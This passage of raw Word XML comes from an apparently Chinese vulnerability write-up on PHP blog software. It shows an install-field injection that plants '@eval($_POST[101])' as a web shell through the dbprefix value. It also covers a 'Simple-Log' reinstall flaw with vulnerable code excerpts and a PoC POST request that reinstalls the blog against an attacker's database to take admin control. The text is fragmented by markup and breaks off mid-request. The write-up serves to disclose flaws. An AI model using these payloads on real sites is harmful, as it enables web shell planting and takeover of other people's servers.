        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>post(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>'email');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>$sub_folder = '/'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>this-&gt;input-&gt;post('base_url').'/';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3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其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dbhost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>dbport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>dbname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>dbuser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 xml:space="preserve">dbpwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都不能随便乱写，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia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74" w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="345"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="Simple-Log博客系统全版本重安装漏洞"/>
      <w:bookmarkStart w:id="16" w:name="_bookmark7"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>乱写的话安装就会出错，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> userid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>pwd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>email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sub_folder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是写入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数据库的，不写入配置文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以就剩下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> dbp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">refix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了，所以我们可以这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>样构造这个字段：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="327" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>dbprefix=sb_';@eval ($_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>POST[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>101]);$xxx='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2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3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  <w:w w:val="99"/>
        </w:rPr>
        <w:t>安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>的时候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4"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="28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32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple-Log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>博客系统全版本重安装漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:t>作者：猪头子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="416" w:firstLine="420"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在没有删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹的情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">install/index.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中用户可以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  <w:w w:val="99"/>
        </w:rPr>
        <w:t>提交远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-19"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-17"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-13"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>账号和密码，导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-17"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>simple-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-17"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-12"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>会重新安装，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-19"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>header(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数并不会结束之后的代码，因此漏洞出现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10102" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:17.4pt;width:319.25pt;height:130.4pt;z-index:136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6" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="449" w:right="916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$setup=!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empty(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$_POST['</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>setup' ])?$_POST['setup']: 'check'; if (file_exists(PBBLOG_ROOT.'home/data/config.php' ))</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="44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require_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once(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PBBLOG_ROOT.'home/data/config.php' );</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="44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45"/>
                    <w:ind w:left="449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用户只要以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post</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/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方式提交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setup=finish</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-67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就可进入安装流程</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="44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($install_lock&amp;&amp; $setup!='finish')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="44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101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11"/>
                    <w:ind w:left="989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//header</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-70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头并不会结束之后的代码，漏洞出在这里</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="98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'location: ../index.php');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="44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44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($setup=='finish' )</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="44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$error=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array(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($_POST['host']))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8"/>
                    <w:ind w:left="108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error[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]= '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>请填写数据库地址</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>' 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($_POST['dbname']))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7"/>
                    <w:ind w:left="108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error[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]= '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>请填写数据库</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>' 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($_POST['dbuser']))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5"/>
                    <w:ind w:left="108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error[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]= '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>请填写数据库用户名</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>' 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($_POST['admin_user']))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  <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:w w:val="99"/>
                      <w:sz w:val="18"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48"/>
                    <w:ind w:left="1080"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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$error[]= '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请填写管理员账号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' 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($_POST['admin_pass']))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8"/>
                    <w:ind w:left="108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error[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]= '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>请填写管理员密码</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>' 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($_POST['blogname']))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5"/>
                    <w:ind w:left="108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error[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]= '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>请填写博客名字</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>' 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($error)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8"/>
                    <w:ind w:left="1080"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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echo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 xml:space="preserve"> '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>错误信息</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>';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foreach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($error as $val)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100" type="#_x0000_t202" style="width:319.25pt;height:537.9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263" w:right="2117"/>
                    <w:jc w:val="center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echo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"$val ";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16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exit</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>;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4"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:ind w:left="54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这里填写自己</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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mysql</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/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数据库的连接信息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$dbhost=$_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'host'];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$dbuser=$_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'dbuser'];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$dbpw=$_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'dbpass'];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$dbname=$_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'dbname'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1442"/>
                    </w:tabs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$charset</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda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'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>utf8';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$db= new cls_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mysql(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pacing w:val="-71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($db-&gt;connect($dbhost,$dbuser,$dbpw,$dbname,$charset,</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-71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$pconnect))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  <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:w w:val="99"/>
                      <w:sz w:val="18"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="1080"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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$error[]= '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数据库连接错误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' ;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(empty ($_POST['dbprefix']))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116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$dbprefix='fb_';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</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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116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$dbprefix=$_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'dbprefix'];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4"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:ind w:left="54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提交的</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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admin_user</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda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和</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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admin_pass</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/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最后将成为</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:spacing w:val="-50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web</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-67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管理员的账号和密码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$admin_user=$_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'admin_user'];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$admin_pass=$_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'admin_pass'];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$blogname=$_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'blogname'];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$blogdesc=$_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'blogdesc'];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$blog_keyword=$_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'blogkeyword'];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99" type="#_x0000_t202" style="width:319.25pt;height:32.6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11" w:line="285" w:lineRule="auto"/>
                    <w:ind w:right="58" w:firstLine="540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之后就写入配置文件和更新数据库，再以后这个</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:spacing w:val="-52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simple-log</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-66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的数据库将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使用用户提交的数据库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5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="313" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10098" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:13.5pt;width:319.25pt;height:146.7pt;z-index:1456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8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POST </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId19">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>http://xxx/install/index.php</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="307" w:lineRule="auto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User-Agent: Opera/9.80 (Windows NT 6.1; WOW64; U; Edition IBIS;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-68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zh-cn) Presto/2.10.229 Version/11.64</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="4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Host: </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId20">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>www.xxx.com</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="285" w:lineRule="auto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Accept: text/html, application/xml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;q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 xml:space="preserve">=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>省略</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>...</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="16"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsi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pacing w:val="-1"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>setup=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-1"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>finish&amp;host=mysql</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-77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的地址</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>&amp;dbname=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>数据库名</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>&amp;dbuser=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>帐号</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
